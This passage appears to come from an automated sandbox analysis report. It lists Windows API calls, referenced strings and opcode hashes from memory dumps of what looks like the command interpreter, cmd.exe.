                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e307feb990d80d05ce8ffc6230fd5553648a7f2643b3dbbe84460bb5ce407ce1
                                    • Instruction ID: 9acdda39cd49338e0207d22fa9440d38266d028a10d89a46df991c3d671e8ab6
                                    • Opcode Fuzzy Hash: e307feb990d80d05ce8ffc6230fd5553648a7f2643b3dbbe84460bb5ce407ce1
                                    • Instruction Fuzzy Hash: CDF08275A0461CABCB04EBB8DA45EAE77B4EF19204F1401AEF915EB380EA34D904C755
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                    • Instruction ID: eb2b25a488277002d55bd1b2c85a1a2670c1a9a01963369968abce6883395965
                                    • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                    • Instruction Fuzzy Hash: D7E0D836A41218BFDB21EBD99E05F5BFBECDB88A61F040157B914DB150D5649D00C2D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 58374e2ce3448a4f92e67cc2f772ee92b18d51053445a5c62a76b80c053090e2
                                    • Instruction ID: 6fc8e6e1744b072be12d4e2d4ad34cd51f2a5d2323fb2751aa06f8e456891dcc
                                    • Opcode Fuzzy Hash: 58374e2ce3448a4f92e67cc2f772ee92b18d51053445a5c62a76b80c053090e2
                                    APIs
                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                    • _get_osfhandle.MSVCRT ref: 011E3D85
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                    • _get_osfhandle.MSVCRT ref: 011E3D99
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06D8
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06EF
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E071E
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E0750
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                      • Part of subcall function 011E3B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                      • Part of subcall function 011E3B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                      • Part of subcall function 011E41DD: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 011E423D
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 011E427D
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 011E42B7
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 011E4307
                                      • Part of subcall function 011E41DD: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 011E4341
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 011E3E9E
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E3EAF
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 011E3EC0
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3EC7
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 011E3EDC
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 011E3F07
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 011E3F18
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 011E3F2E
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 011E3F3F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3F5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOpenOutputTitlememcpy
                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                    • API String ID: 570592814-3021193919
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 011E423D
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 011E427D
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 011E42B7
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 011E4307
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 011E4341
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 011E4391
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 011E4401
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 011E449A
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011E44AE
                                    • time.MSVCRT ref: 011E44C8
                                    • srand.MSVCRT ref: 011E44CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: QueryValue$CloseOpensrandtime
                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                    • API String ID: 145004033-3846321370
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011F6613
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 011F668C
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F6B01
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • _get_osfhandle.MSVCRT ref: 011F66E9
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F66F1
                                    • _get_osfhandle.MSVCRT ref: 011F6701
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6709
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011F6739
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F6741
                                    • memmove.MSVCRT ref: 011F678F
                                    • _get_osfhandle.MSVCRT ref: 011F6812
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F681A
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 011F6882
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 011F692B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011F6932
                                    • _get_osfhandle.MSVCRT ref: 011F697E
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6986
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 011F6A1E
                                    • _get_osfhandle.MSVCRT ref: 011F6A76
                                    • SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6A7E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6AAD
                                      • Part of subcall function 011F9953: _get_osfhandle.MSVCRT ref: 011F9956
                                      • Part of subcall function 011F9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F995E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
                                    • String ID: DPATH
                                    • API String ID: 1247154890-2010427443
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E4516
                                    • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 011E4523
                                      • Part of subcall function 011E465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,011E4533), ref: 011E4687
                                      • Part of subcall function 011E465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 011E4538
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 011E4555
                                    • _setjmp3.MSVCRT ref: 011E45BD
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 011E45EE
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E45FF
                                    • exit.MSVCRT ref: 011E4625
                                    • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 011EE707
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011EE710
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E4770
                                      • Part of subcall function 011E4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,011ED822,?,00000000,00000000), ref: 011E478C
                                      • Part of subcall function 011E46D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                      • Part of subcall function 011E46D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                      • Part of subcall function 011E46D8: memset.MSVCRT ref: 011E4703
                                      • Part of subcall function 011E3D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                      • Part of subcall function 011E3D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                      • Part of subcall function 011E3D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                      • Part of subcall function 011E3D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D85
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                      • Part of subcall function 011E3D27: _get_osfhandle.MSVCRT ref: 011E3D99
                                      • Part of subcall function 011E3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                      • Part of subcall function 011E3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • _setjmp3.MSVCRT ref: 011EE785
                                    Strings
                                    • Software\Policies\Microsoft\Windows\System, xrefs: 011E454B
                                    • DisableCMD, xrefs: 011EE6FF
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                    • API String ID: 4268540630-1920437939
                                    • Opcode ID: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction ID: 11d40929f194e6a4fe30daf578201b1c5c5b5d6784bd68168e57703f76d61b55
                                    • Opcode Fuzzy Hash: 258c7f85789d3589728d130d71ac42415d2784560b8ff00759d0a926a641b4b5
                                    • Instruction Fuzzy Hash: C171D571E41A0AEEEF3DEBF5BC9CA7E3BE9EB18218B140429E501D2185DF70C4408B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • _wcsicmp.MSVCRT ref: 011DD005
                                    • _wcsicmp.MSVCRT ref: 011DD01B
                                    • _wcsicmp.MSVCRT ref: 011DD031
                                    • _wcsicmp.MSVCRT ref: 011DD047
                                    • _wcsicmp.MSVCRT ref: 011DD05D
                                    • _wcsicmp.MSVCRT ref: 011DD073
                                    • _wcsicmp.MSVCRT ref: 011DD085
                                    • _wcsicmp.MSVCRT ref: 011DD09B
                                      • Part of subcall function 011D96A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                      • Part of subcall function 011D96A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                      • Part of subcall function 011D96A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                      • Part of subcall function 011D96A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                    • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                    • API String ID: 2447294730-2301591722
                                    • Opcode ID: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction ID: 5a0ed5444746943e53c27e84cdc6754e49d4beb7520d823db971327570d2ce85
                                    • Opcode Fuzzy Hash: 77fa3b9015e4fa74c4e1c1616ef2b14e436a23b6f85ebab8c8c6beafb079d4a7
                                    • Instruction Fuzzy Hash: 1F311832608602ABFF3CA77ABC1DFAB26DDDB95564B14441EF512D11C4EF319002C766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: iswspace$wcschr$iswdigit$_setjmp3
                                    • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                    • API String ID: 1805751789-2755026540
                                    • Opcode ID: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction ID: 3b2e26927944b91f88d64370b0b0d0722f7b0f0ba93f8f8ff0ccbb8749d1bbe7
                                    • Opcode Fuzzy Hash: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                    • Instruction Fuzzy Hash: F4E10675A00213AADF3D8F6DA94C3BA3BA0AF05258F594126ED47D7292E734C783C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcsupr.MSVCRT ref: 011F9629
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 011F968F
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F9697
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96A7
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96BD
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F96C5
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96D5
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96E9
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F974C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F9753
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 011F976C
                                    • towupper.MSVCRT ref: 011F978D
                                    • wcschr.MSVCRT ref: 011F97E6
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9818
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9826
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                    • String ID: <noalias>$CMD.EXE
                                    • API String ID: 2015057810-1690691951
                                    • Opcode ID: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction ID: 60a33344397155c4b31afdd1e785ca39ac74416fc1a4e70281673e98e544ff37
                                    • Opcode Fuzzy Hash: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
                                    • Instruction Fuzzy Hash: 5F81DA71E002189BDF28EFB8D858BEE7BB5AF55618F08021DFE02A7284DB719945CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 011F1D51
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 011F1DB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CurrentFormatMessageThread
                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                    • API String ID: 2411632146-2849347638
                                    • Opcode ID: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction ID: 11ef462c5647e08d3f75faa70b0c3cdbd028b8f7b44a4285ebacfc2e7a8eb1e1
                                    • Opcode Fuzzy Hash: 3f9c48d63387b4ee8cca38820414baae4e9395b5b24790d64c523bdc13b3a5f0
                                    • Instruction Fuzzy Hash: F15122B1900711FBEB3DAF699C08EABBBB8EB54300F00455DF32A92552D7719980CB22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1380661413-3584302480
                                    • Opcode ID: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction ID: 6dc516c65a3c5d278609d9408169d379666fc48460fcd179a318d4dcd9cfbe24
                                    • Opcode Fuzzy Hash: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction Fuzzy Hash: 53B1F4306097118BDB3DDFA8E45872A7BE1BF84719F05052DE9468B294EB71D885CF83
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 011DD18E
                                    • _open_osfhandle.MSVCRT ref: 011DD1A2
                                    • _wcsicmp.MSVCRT ref: 011DD1EF
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,011FF830,00002000), ref: 011DD221
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 011DD25F
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011DD287
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 011DD2A3
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 011EB5B4
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011EB5CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
                                    • String ID: con
